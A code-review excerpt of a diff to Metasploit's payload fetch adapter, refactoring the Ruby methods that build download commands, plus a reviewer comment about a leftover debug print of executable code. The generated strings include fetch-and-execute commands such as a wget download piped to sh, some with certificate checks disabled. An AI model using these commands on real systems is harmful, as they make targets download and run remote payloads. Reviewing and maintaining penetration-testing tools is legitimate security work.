lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -1,446 +1,558 @@
-    when 'HTTPS'
-      get_file_cmd = "tnftp -Vo #{_remote_destination_nix} https://#{download_uri}"
-    else
-      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
-    end
-    _execute_add(get_file_cmd)
-  end
+    def _generate_tnftp_command(uri)
+      case fetch_protocol
+      when 'FTP'
+        get_file_cmd = "tnftp -Vo #{_remote_destination_nix} ftp://#{download_uri(uri)}"
+      when 'HTTP'
+        get_file_cmd = "tnftp -Vo #{_remote_destination_nix} http://#{download_uri(uri)}"
+      when 'HTTPS'
+        get_file_cmd = "tnftp -Vo #{_remote_destination_nix} https://#{download_uri(uri)}"
+      else
+        fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
+      end
+      _execute_add(get_file_cmd)
+    end
 
-  def _generate_wget_command
-    case fetch_protocol
-    when 'HTTPS'
-      get_file_cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri}"
-    when 'HTTP'
-      get_file_cmd = "wget -qO #{_remote_destination} http://#{download_uri}"
-    else
-      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
+    def _generate_wget_command(uri)
+      case fetch_protocol
+      when 'HTTPS'
+        get_file_cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri(uri)}"
+      when 'HTTP'
+        get_file_cmd = "wget -qO #{_remote_destination} http://#{download_uri(uri)}"
+      else
+        fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
+      end
+
+      _execute_add(get_file_cmd)
     end
 
-    _execute_add(get_file_cmd)
-  end
+    def _generate_wget_pipe(uri)
+      case fetch_protocol
+      when 'HTTPS'
+        return "wget --no-check-certificate -qO- https://#{_download_pipe(uri)}|sh"
+      when 'HTTP'
+        return "wget -qO- http://#{_download_pipe(uri)}|sh"
+      else
+        fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
+      end
+    end
 
-  def _generate_wget_pipe
-    case fetch_protocol
-    when 'HTTPS'
-      return "wget --no-check-certificate -qO- https://#{_download_pipe}|sh"
-    when 'HTTP'
-      return "wget -qO- http://#{_download_pipe}|sh"
-    else
-      fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
+    def _generate_multi_commands(arch_payloads = [])
+      # There is a great deal of room for improvement here.
+      script = 'archinfo=$(uname -m);'
+      arch_payloads.each do |srv_entry|
+        vprint_status("Adding #{srv_entry[:uri]} for #{srv_entry[:arch]}")
+        os_arches(srv_entry[:arch]).each do |os_arch|
+          script << "if [ #{os_arch} = $archinfo ]; then (#{generate_fetch_commands(srv_entry[:uri])}); fi; "
+          # If I add an exit to this so that it leaves after launching, FETCH_FILELESS bash fails
+        end
+      end
+      print_status(script)
```

Comment:
This looks like it was left over from debugging. If it's necessary to keep it, can you add some context in a message so the user knows what they're looking at instead of just logging executable code?
```suggestion
```